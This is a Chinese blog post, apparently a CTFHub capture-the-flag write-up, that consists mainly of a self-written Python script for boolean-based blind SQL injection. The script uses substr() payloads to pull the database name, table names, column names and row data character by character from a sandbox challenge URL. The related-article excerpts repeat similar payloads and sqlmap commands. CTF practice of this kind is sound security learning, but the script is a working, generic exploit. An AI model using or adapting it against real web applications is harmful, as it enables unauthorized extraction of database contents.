CTFHub-布尔盲注-wp #(自制脚本做法)

最新推荐文章于 2024-06-12 08:30:00 发布
最新推荐文章于 2024-06-12 08:30:00 发布
阅读量3.7k 收藏
点赞数 2
分类专栏: CTFHub-wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37450949/article/details/116864231
版权

CTFHub布尔盲注脚本

# -*- coding: utf-8 -*-
# @Time : 2021/5/15 21:33
# @Author : z1moq
# @File : ctfhub布尔盲注.py
# @Software: PyCharm
import requests
import string


def get_database(url, mark):
    database = ''
    for i in range(1, 9):
        for j in string.ascii_letters:
            target = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
            r = requests.get(target)
            if mark in r.text:
                database += j
                print(database)
                break
    print('Database:', database)
    return database


def get_table(url, mark, database):
    tablesname = []
    for i in range(0, 2):
        name = ''
        for j in range(1, 6):
            for k in string.ascii_letters:
                target = url + 'if(substr((select table_name from information_schema.tables where table_schema="' +\
                         database + '" limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                r = requests.get(target)
                if mark in r.text:
                    name += k
                    print(name)
                    break
        tablesname.append(name)
    print('Tablesame:', tablesname)
    return input("Choose TableName:")


def get_columns(url, mark, tablename, database):
    columns = []
    for i in range(0, 3):
        name = ''
        for j in range(1, 6):
            for k in string.ascii_letters:
                target = url + 'if(substr((select column_name from information_schema.columns where table_name="'\
                         + tablename + '" and table_schema="' + database\
                         + '" limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                r = requests.get(target)
                if mark in r.text:
                    name += k
                    print(name)
                    break

        columns.append(name)
    print('Columnsname:', columns)
    return input("Choose Columnname:")

def getdata(url,mark,tablename,database,columns):
    data = ''
    for i in range(0, 50):
        for j in string.digits\
                 + string.ascii_letters\
                 + string.punctuation:
            payload = url + 'if(substr((select '\
                      +columns\
                      + ' from ' + tablename\
                      + '),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
            request = requests.get(payload)
            if mark in request.text:
                data += j
                print(data)
                break
    print(data)

if __name__ == "__main__":
    url = "http://challenge-1d65b510fd09970c.sandbox.ctfhub.com:10080/?id="
    mark = "query_success"
    database = get_database(url, mark)
    tablename = get_table(url, mark, database)
    columns=get_columns(url, mark, tablename, database)
    getdata(url, mark, tablename, database,columns)
不想弹solo
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL入之基于布尔详解
09-10
在实际操作中,由于手动进行布尔非常耗时,通常会编写自动化脚本来辅助。例如,Python的`requests`库可以用来发送HTTP请求,通过检查响应的长度或内容来判断SQL查询的正确性。这样的脚本会迭代所有可能的字符...
布尔python脚本
04-22
.py文件,python脚本实现布尔,输入网址实现自动化入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 意事项:python3.8,就用了一个requests第三方库,单线程实现...
CTFHUB-布尔
Web学习之路
03-24 1036
true 与 false
CTFHUB-SQL入-布尔
最新发布
weixin_68416970的博客
06-12 650
布尔是一种在SQL入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL入手法无法获得直接的错误信息,此时就需要使用布尔来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
CTFHub-布尔/时间-wp #(sqlmap做法)
z1moq的博客
05-15 3110
布尔/时间(sqlmap做法) 使用 python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" --banner 扫描网站 发现存在漏洞 使用 python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" --current-db 跑出库名 使用 pyth
CTFHUB-WEB-SQL入-布尔
weixin_49539962的博客
08-04 337
题目告诉我们了,这是个布尔,就不需要一个个试验入的方法了。接下来的解题思路应当是:首先通过折半查找的方法,通过界面的回显结果找出数据库名字的长度,并通过相同的方法依次找到数据库名字的每个字符、列名,然后再找到flag。自己手动一个个找当然可以,不过速度慢,写个脚本好了。有个工具叫sqlmap,用这个就不需要傻乎乎写脚本了。既然已知了数据库名字和列名,下面就在sqlmap上直接查flag吧(sqlmap实在是太慢了,陆陆续续续了40分钟)。找到数据库名还是叫sqli,估计列名里面有一个flag。
布尔(ctfhub)_ctf 布尔脚本
2401_84010702的博客
04-22 444
布尔的条件: ?id=1’ and 1=1–+ 真页面true?id=1’ and 1=2–+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数 2. 根据库名长度爆库名 使用substrate()函数逐个猜数据库名 3. 爆数据表数量 使用mysql的查询语句。从1开始试错 4.爆数据表名长度 使用 limit 0,1(第一张表),limit 1,1(第二张表)
CTFHUB-技能树-Web题-SQL入-布尔
Static______的博客
04-02 757
由于返回值是正确或错误,寻常and 后面布尔语句不好使,因为它们是根据查询结果为空来判断。输入1 (也可输入1 and 1=1)返回 query_success。输入1’ (也可输入1 and 1=2)返回query_error。发现1 and length(database()) >=1 正确。1 and length(database()) >=5 错误。1 and length(database()) >=4正确。要一个一个判断有点难,可以用python脚本。这时候想到用if语句。
CTFHub | 布尔
尼泊罗河伯的博客
10-29 1787
根据网页显示内容输入1进行测试,此题可能存在 SQL 入。构造 payload 验证是否属于整数型入,确定此题为整数型入。使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
ctfhub-sql布尔
god_001的博客
06-01 657
打开网址,先输入: 得到:输入: 得到:看出可以布尔查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
CTFHub (web-SQL-布尔sqlmap)
m0_64444909的博客
05-09 749
一、关于sqlmap 一款自动化的SQL入工具,其主要功能是扫描,发现并利用给定的URL的SQL入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL入技术,分别是: 1、基于布尔,即可以根据返回页面判断条件真假的入。 2、基于时间的,即不能根据页面返回内容判断任何信息,用条件语
布尔python脚本.zip
12-28
在给定的压缩包文件"布尔python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔的Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔原理**...
布尔.py_sqlpython_
10-03
在这个场景中,我们关的是一个名为"布尔.py"的Python脚本,它显然是用于演示或执行SQL的工具。 在SQL中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
mysql-blind(高级+基于布尔).docx
01-23
【MySQL 高级布尔详解】 MySQL 的,特别是布尔,是一种在目标页面无明显回显时检测SQL入漏洞的技术。这种技术源于某些网站的错误处理机制使得常规的UNION查询无法直接揭示数据字段。...
CTFHub-时间-wp #(自制脚本做法)
z1moq的博客
05-16 5130
时间脚本 # -*- coding: utf-8 -*- # @Time : 2021/5/16 19:29 # @Author : z1moq # @File : ctfhub时间.py # @Software: PyCharm import requests import string import time def get_database(url): database = '' for i in range(1, 9): for j in string.as
CTFHub-网站源码-wp
z1moq的博客
06-07 1025
根据网站提示,可知只要测试出网站源码备份的文件名称即可通过备份内容得出flag,故自制测试脚本 import requests url=(input("URL:")) list1=['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp'] list2=['tar', 'tar.gz', 'zip', 'rar'] for i in list1: for j in list2: url_f=url+'/'+i+'..
CTFHub-SVN泄露-wp
z1moq的博客
06-16 617
SVN又是一个知识区,先百度看看 1.SVN是subversion的缩写,是一个开放源代码的版本控制系统,通过采用分支管理系统的高效管理,简而言之就是用于多个人共同开发同一个项目,实现共享资源,实现最终集中式的管理。 2.相较于git,svn通常需要一个集中的服务器来控制,而git为分布式控制系统,户端并不只提取最新版本的文件快照,而是把原始的代码仓库完整地镜像下来。这么一来,任何一处协同工作用的服务器发生故障,事后都可以用任何一个镜像出来的本地仓库恢复。这类系统都可以指定和若干不同的远端代码仓库进.
ctfhub布尔
08-31
布尔是一种常用于渗透测试中的技术,用于检测和利用应用程序中的漏洞。在CTF比赛中,也经常会涉及到布尔的题目。 布尔是通过构造恶意的输入来判断应用程序是否存在漏洞。它的原理是利用应用程序对输入的处理方式,通过观察应用程序在不同输入情况下的响应,来推断出隐藏在后台数据库中的信息。 在CTFhub中,进行布尔可以通过构造不同的查询语句来判断条件是否成立。以下是一个示例: 假设存在一个登录页面,我们需要猜测正确的用户名和密码。我们可以通过发送恶意输入来检测用户名是否正确。例如,我们可以构造如下的查询语句: `SELECT * FROM users WHERE username = 'admin' AND password LIKE 'a%'` 如果应用程序返回了正常的结果(例如登录成功),那么说明用户名是正确的。否则,我们可以根据返回结果判断用户名是否错误。 通过不断尝试不同的查询语句,我们可以逐步猜测出正确的用户名和密码,从而实现布尔攻击。 需要意的是,在进行布尔时,需要谨慎处理恶意输入,避免对应用程序造成不必要的风险。同时,合法授权下进行渗透测试是合法的,未经授权的渗透测试则是违法行为。在进行CTF比赛或渗透测试时,请遵守相关法律法规和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不想弹solo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值